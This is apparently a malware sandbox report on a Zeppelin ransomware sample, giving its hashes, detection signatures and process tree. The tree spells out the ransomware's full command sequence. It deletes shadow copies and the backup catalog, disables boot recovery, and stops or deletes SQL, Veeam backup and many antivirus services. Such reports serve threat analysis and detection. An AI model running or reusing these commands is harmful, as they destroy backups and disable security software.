Analysis
- max time kernel: 119s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240215-en
- resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
- submitted: 26-02-2024 17:44
Behavioral task: behavioral1
- Sample: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
- Resource: win7-20240215-en
Behavioral task: behavioral2
- Sample: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
- Resource: win10v2004-20240221-en
General
- Target: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
- Size: 227KB
- MD5: b2a478d698a2789ce04d8d54158a7d64
- SHA1: 49cf775b235dd75dde60a70af385fff93a665e9c
- SHA256: a2ef8ef7be1ef11158f7d406e96c240178068b9692ec5e5ce19f9239345ee825
- SHA512: 6b9b62d1f0610fff7cd79fb10e44a50739405043d168ca240a7bde22eea231ed74f20d77a99b2fe1d65f14581463d0fc0ca61e9fc54ca9e9c6b8ab23d7c746eb
- SSDEEP: 6144:eia1C9bP2XUJmcCvyr/2H64DQFu/U3buRKlemZ9DnGAefIC8+:eq9bP2Rfo/2a4DQFu/U3buRKlemZ9DnY
Malware Config
Extracted
C:\$Recycle.Bin\S-1-5-21-2248906074-2862704502-246302768-1000\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT
https://tox.chat/download.html
Signatures
-
Detects Zeppelin payload 7 IoCs
-
Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detects command variations typically used by ransomware 1 IoCs
resource: behavioral1/files/0x000b000000012252-13.dat, yara_rule: INDICATOR_SUSPICIOUS_GENRansomware
-
Renames multiple (7439) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid: 1892, Process: notepad.exe
-
Enumerates connected drives 3 TTPs 32 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
File created: C:\Windows\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT (Process: 2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe)
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utility to control services on the system.
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
-
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 25 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe "C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe" 1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete 2⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\Wbem\WMIC.exe wmic shadowcopy delete 3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no 2⤵ PID:2968
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures 2⤵ PID:2580
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet 2⤵ PID:2632
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet 2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\vssadmin.exe vssadmin delete shadows /all /quiet 3⤵
- Interacts with shadow copies
PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat 2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\Wbem\WMIC.exe wmic shadowcopy delete 3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\SysWOW64\vssadmin.exe vssadmin delete shadows /all /quiet 3⤵
- Interacts with shadow copies
PID:2312
-
-
C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB 3⤵
- Interacts with shadow copies
PID:2168
-
-
C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB 3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1772
-
-
C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe resize shadowstorage /for=F: /on=F: /maxsize=401MB 3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2384
-
-
C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe resize shadowstorage /for=G: /on=G: /maxsize=401MB 3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2768
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=H: /on=H: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2052
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=J: /on=J: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2288
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=K: /on=K: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2436
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=L: /on=L: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:636
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=M: /on=M: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1408
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe resize shadowstorage /for=N: /on=N: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:696
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive3⤵PID:320
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start=disabled3⤵PID:2344
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵PID:2324
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$CITRIX3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$CITRIX start=disabled3⤵PID:1492
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1828
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:768
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:1748
-
-
C:\Windows\SysWOW64\sc.exesc stop MSOLAP$CITRIX3⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\SysWOW64\sc.exesc config MSOLAP$CITRIX start=disabled3⤵PID:2828
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵
- Launches sc.exe
PID:1364
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:1648
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵
- Launches sc.exe
PID:992
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS3⤵PID:2704
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS start=disabled3⤵
- Launches sc.exe
PID:1460
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1904
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:2972
-
-
C:\Windows\SysWOW64\sc.exesc stop postgresql-9.53⤵PID:320
-
-
C:\Windows\SysWOW64\sc.exesc config postgresql-9.5 start=disabled3⤵
- Launches sc.exe
PID:2596
-
-
C:\Windows\SysWOW64\sc.exesc stop fsdevcon3⤵PID:1352
-
-
C:\Windows\SysWOW64\sc.exesc config fsdevcon start=disabled3⤵PID:552
-
-
C:\Windows\SysWOW64\sc.exesc stop fshoster3⤵
- Launches sc.exe
PID:1536
-
-
C:\Windows\SysWOW64\sc.exesc config fshoster start=disabled3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc stop fsnethoster3⤵PID:1884
-
-
C:\Windows\SysWOW64\sc.exesc config fsnethoster start=disabled3⤵PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulhoster3⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\SysWOW64\sc.exesc config fsulhoster start=disabled3⤵PID:2172
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulnethoster3⤵
- Launches sc.exe
PID:2660
-
-
C:\Windows\SysWOW64\sc.exesc config fsulnethoster start=disabled3⤵
- Launches sc.exe
PID:1832
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulorsp3⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\SysWOW64\sc.exesc config fsulorsp start=disabled3⤵PID:2656
-
-
C:\Windows\SysWOW64\sc.exesc stop fsulprothoster3⤵PID:1984
-
-
C:\Windows\SysWOW64\sc.exesc config fsulprothoster start=disabled3⤵PID:1516
-
-
C:\Windows\SysWOW64\sc.exesc stop FSAUS3⤵PID:2924
-
-
C:\Windows\SysWOW64\sc.exesc config FSAUS start=disabled3⤵PID:540
-
-
C:\Windows\SysWOW64\sc.exesc stop fsms3⤵PID:3016
-
-
C:\Windows\SysWOW64\sc.exesc config fsms start=disabled3⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAWSSvc3⤵PID:2724
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAWSSvc start=disabled3⤵PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamAzureSvc3⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamAzureSvc start=disabled3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamEnterpriseManagerSvc3⤵PID:2608
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamEnterpriseManagerSvc start=disabled3⤵PID:1408
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupRESTSvc3⤵
- Launches sc.exe
PID:772
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupRESTSvc start=disabled3⤵PID:924
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupSvc3⤵PID:1148
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupSvc start=disabled3⤵PID:1032
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamFilesysVssSvc3⤵PID:2308
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamFilesysVssSvc start=disabled3⤵PID:336
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBrokerSvc3⤵PID:1288
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBrokerSvc start=disabled3⤵PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamBackupCdpSvc3⤵PID:1992
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamBackupCdpSvc start=disabled3⤵PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCloudSvc3⤵PID:2312
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCloudSvc start=disabled3⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamTransportSvc3⤵PID:1472
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamTransportSvc start=disabled3⤵PID:540
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDistributionSvc3⤵PID:784
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDistributionSvc start=disabled3⤵PID:1968
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamExplorersRecoverySvc3⤵PID:2452
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamExplorersRecoverySvc start=disabled3⤵PID:2504
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGCPSvc3⤵PID:2420
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGCPSvc start=disabled3⤵PID:804
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamGuestHelper3⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamGuestHelper start=disabled3⤵PID:1920
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamCatalogSvc3⤵
- Launches sc.exe
PID:308
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamCatalogSvc start=disabled3⤵PID:2972
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamHvIntegrationSvc3⤵PID:2548
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamHvIntegrationSvc start=disabled3⤵PID:2856
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamDeploySvc3⤵PID:1792
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamDeploySvc start=disabled3⤵PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamMountSvc3⤵PID:2940
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamMountSvc start=disabled3⤵PID:1492
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamRESTSvc3⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamRESTSvc start=disabled3⤵PID:1900
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamNFSSvc3⤵PID:1952
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamNFSSvc start=disabled3⤵PID:872
-
-
C:\Windows\SysWOW64\sc.exesc stop VeeamVssProviderSvc3⤵PID:592
-
-
C:\Windows\SysWOW64\sc.exesc config VeeamVssProviderSvc start=disabled3⤵PID:2780
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher$CITRIX3⤵PID:2248
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher$CITRIX start= disabled3⤵PID:2724
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$VEEAMSQL20163⤵PID:2672
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$VEEAMSQL2016 start=disabled3⤵PID:2436
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLBrowser3⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\SysWOW64\sc.exesc config SQLBrowser start=disabled3⤵PID:1104
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:592
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter3⤵PID:1980
-
-
C:\Windows\SysWOW64\sc.exesc config SQLWriter start=disabled3⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc stop SageMySQL3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config SageMySQL start=disabled3⤵PID:1556
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$VEEAMSQL20163⤵PID:2036
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$VEEAMSQL2016 start=disabled3⤵PID:2492
-
-
C:\Windows\SysWOW64\sc.exesc stop ReportServer$V4SQLEXPRESS3⤵PID:2032
-
-
C:\Windows\SysWOW64\sc.exesc config ReportServer$V4SQLEXPRESS start=disabled3⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$SDPRO_V4_SQL3⤵
- Launches sc.exe
PID:2540
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$MICROSOFT##WID3⤵PID:2600
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$MICROSOFT##WID start=disabled3⤵PID:2704
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLServerOLAPService3⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLServerOLAPService start=disabled3⤵PID:2144
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLFDLauncher3⤵PID:2712
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLFDLauncher start=disabled3⤵
- Launches sc.exe
PID:580
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLSERVERAGENT3⤵
- Launches sc.exe
PID:992
-
-
C:\Windows\SysWOW64\sc.exesc config SQLSERVERAGENT start=disabled3⤵PID:2220
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:908
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY3⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY start=disabled3⤵PID:2584
-
-
C:\Windows\SysWOW64\sc.exesc stop MsDtsServer1303⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\SysWOW64\sc.exesc config MsDtsServer130 start=disabled3⤵
- Launches sc.exe
PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLTELEMETRY$BVMS3⤵PID:1180
-
-
C:\Windows\SysWOW64\sc.exesc config SQLTELEMETRY$BVMS start=disabled3⤵PID:596
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQL$SQLEXPRESS20143⤵PID:1280
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQL$SQLEXPRESS2014 start=disabled3⤵PID:2932
-
-
C:\Windows\SysWOW64\sc.exesc stop MSSQLSERVER3⤵PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc config MSSQLSERVER start=disabled3⤵PID:804
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmickvpexchange"3⤵PID:2468
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicguestinterface"3⤵
- Launches sc.exe
PID:920
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicshutdown"3⤵PID:2920
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicheartbeat"3⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicrdv"3⤵PID:2328
-
-
C:\Windows\SysWOW64\sc.exesc delete "storflt"3⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmictimesync"3⤵PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc delete "vmicvss"3⤵PID:1680
-
-
C:\Windows\SysWOW64\sc.exesc delete "hvdsvc"3⤵PID:2384
-
-
C:\Windows\SysWOW64\sc.exesc delete "nvspwmi"3⤵PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc delete "wmms"3⤵PID:1524
-
-
C:\Windows\SysWOW64\sc.exesc delete "AvgAdminServer"3⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVG Antivirus"3⤵PID:2960
-
-
C:\Windows\SysWOW64\sc.exesc delete "avgAdminClient"3⤵PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVService"3⤵PID:2732
-
-
C:\Windows\SysWOW64\sc.exesc delete "SAVAdminService"3⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos AutoUpdate Service"3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Clean Service"3⤵PID:2648
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Device Control Service"3⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:280
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos File Scanner Service"3⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Health Service"3⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Agent"3⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos MCS Client"3⤵PID:3052
-
-
C:\Windows\SysWOW64\sc.exesc delete "SntpService"3⤵PID:2340
-
-
C:\Windows\SysWOW64\sc.exesc delete "swc_service"3⤵PID:3012
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_service"3⤵PID:1320
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos UI"3⤵
- Launches sc.exe
PID:2620
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_update"3⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Web Control Service"3⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos System Protection Service"3⤵PID:3044
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Safestore Service"3⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\SysWOW64\sc.exesc delete "hmpalertsvc"3⤵PID:1192
-
-
C:\Windows\SysWOW64\sc.exesc delete "RpcEptMapper"3⤵PID:324
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sophos Endpoint Defense Service"3⤵PID:2516
-
-
C:\Windows\SysWOW64\sc.exesc delete "SophosFIM"3⤵PID:1832
-
-
C:\Windows\SysWOW64\sc.exesc delete "swi_filter"3⤵PID:2196
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdGuardianDefaultInstance"3⤵PID:2360
-
-
C:\Windows\SysWOW64\sc.exesc delete "FirebirdServerDefaultInstance"3⤵PID:2396
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"3⤵PID:1020
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLSERVER"3⤵PID:900
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLSERVERAGENT"3⤵PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLBrowser"3⤵
- Launches sc.exe
PID:284
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY"3⤵PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer130"3⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc delete "SSISTELEMETRY130"3⤵PID:1236
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLWriter"3⤵
- Launches sc.exe
PID:472
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$VEEAMSQL2012"3⤵PID:2320
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$VEEAMSQL2012"3⤵
- Launches sc.exe
PID:2404
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL"3⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent"3⤵PID:2756
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerADHelper100"3⤵PID:2620
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLServerOLAPService"3⤵PID:1448
-
-
C:\Windows\SysWOW64\sc.exesc delete "MsDtsServer100"3⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer"3⤵PID:1064
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLTELEMETRY$HL"3⤵PID:360
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMBMServer"3⤵PID:2960
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$PROGID"3⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$WOLTERSKLUWER"3⤵PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$PROGID"3⤵PID:2152
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$WOLTERSKLUWER"3⤵PID:2860
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher$OPTIMA"3⤵PID:2456
-
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQL$OPTIMA"3⤵PID:1900
-
-
C:\Windows\SysWOW64\sc.exesc delete "SQLAgent$OPTIMA"3⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\SysWOW64\sc.exesc delete "ReportServer$OPTIMA"3⤵
- Launches sc.exe
PID:804
-
-
C:\Windows\SysWOW64\sc.exesc delete "msftesql$SQLEXPRESS"3⤵PID:3064
-
-
C:\Windows\SysWOW64\sc.exesc delete "postgresql-x64-9.4"3⤵PID:488
-
-
C:\Windows\SysWOW64\sc.exesc delete "WRSVC"3⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrn"3⤵PID:912
-
-
C:\Windows\SysWOW64\sc.exesc delete "ekrnEpsw"3⤵
- Launches sc.exe
PID:592
-
-
C:\Windows\SysWOW64\sc.exesc delete "klim6"3⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exesc delete "AVP18.0.0"3⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc delete "KLIF"3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\SysWOW64\sc.exesc delete "klpd"3⤵PID:2432
-
-
C:\Windows\SysWOW64\sc.exesc delete "klflt"3⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupdisk"3⤵
- Launches sc.exe
PID:2176
-
-
C:\Windows\SysWOW64\sc.exesc delete "klbackupflt"3⤵PID:1644
-
-
C:\Windows\SysWOW64\sc.exesc delete "klkbdflt"3⤵PID:1052
-
-
C:\Windows\SysWOW64\sc.exesc delete "klmouflt"3⤵PID:1600
-
-
C:\Windows\SysWOW64\sc.exesc delete "klhk"3⤵PID:488
-
-
C:\Windows\SysWOW64\sc.exesc delete "KSDE1.0.0"3⤵PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc delete "kltap"3⤵
- Launches sc.exe
PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc delete "ScSecSvc"3⤵PID:1216
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Mail Protection"3⤵PID:2600
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning Server"3⤵PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Scanning ServerEx"3⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\SysWOW64\sc.exesc delete "Online Protection System"3⤵PID:1180
-
-
C:\Windows\SysWOW64\sc.exesc delete "RepairService"3⤵
- Launches sc.exe
PID:2308
-
-
C:\Windows\SysWOW64\sc.exesc delete "Core Browsing Protection"3⤵PID:2844
-
-
C:\Windows\SysWOW64\sc.exesc delete "Quick Update Service"3⤵PID:880
-
-
C:\Windows\SysWOW64\sc.exesc delete "McAfeeFramework"3⤵PID:2936
-
-
C:\Windows\SysWOW64\sc.exesc delete "macmnsvc"3⤵PID:276
-
-
C:\Windows\SysWOW64\sc.exesc delete "masvc"3⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\SysWOW64\sc.exesc delete "mfemms"3⤵PID:1232
-
-
C:\Windows\SysWOW64\sc.exesc delete "mfevtp"3⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\SysWOW64\sc.exesc delete "TmFilter"3⤵PID:1440
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMLWCSService"3⤵PID:2316
-
-
C:\Windows\SysWOW64\sc.exesc delete "tmusa"3⤵PID:2136
-
-
C:\Windows\SysWOW64\sc.exesc delete "TmPreFilter"3⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMSmartRelayService"3⤵PID:2600
-
-
C:\Windows\SysWOW64\sc.exesc delete "TMiCRCScanService"3⤵PID:2508
-
-
C:\Windows\SysWOW64\sc.exesc delete "VSApiNt"3⤵PID:2444
-
-
C:\Windows\SysWOW64\sc.exesc delete "TmCCSF"3⤵PID:2520
-
-
C:\Windows\SysWOW64\sc.exesc delete "tmlisten"3⤵PID:2380
-
-
C:\Windows\SysWOW64\sc.exesc delete "TmProxy"3⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\SysWOW64\sc.exesc delete "ntrtscan"3⤵PID:284
-
-
C:\Windows\SysWOW64\sc.exesc delete "ofcservice"3⤵PID:996
-
-
C:\Windows\SysWOW64\sc.exesc delete "TmPfw"3⤵PID:1276
-
-
C:\Windows\SysWOW64\sc.exesc delete "PccNTUpd"3⤵PID:540
-
-
C:\Windows\SysWOW64\sc.exesc delete "PandaAetherAgent"3⤵PID:1220
-
-
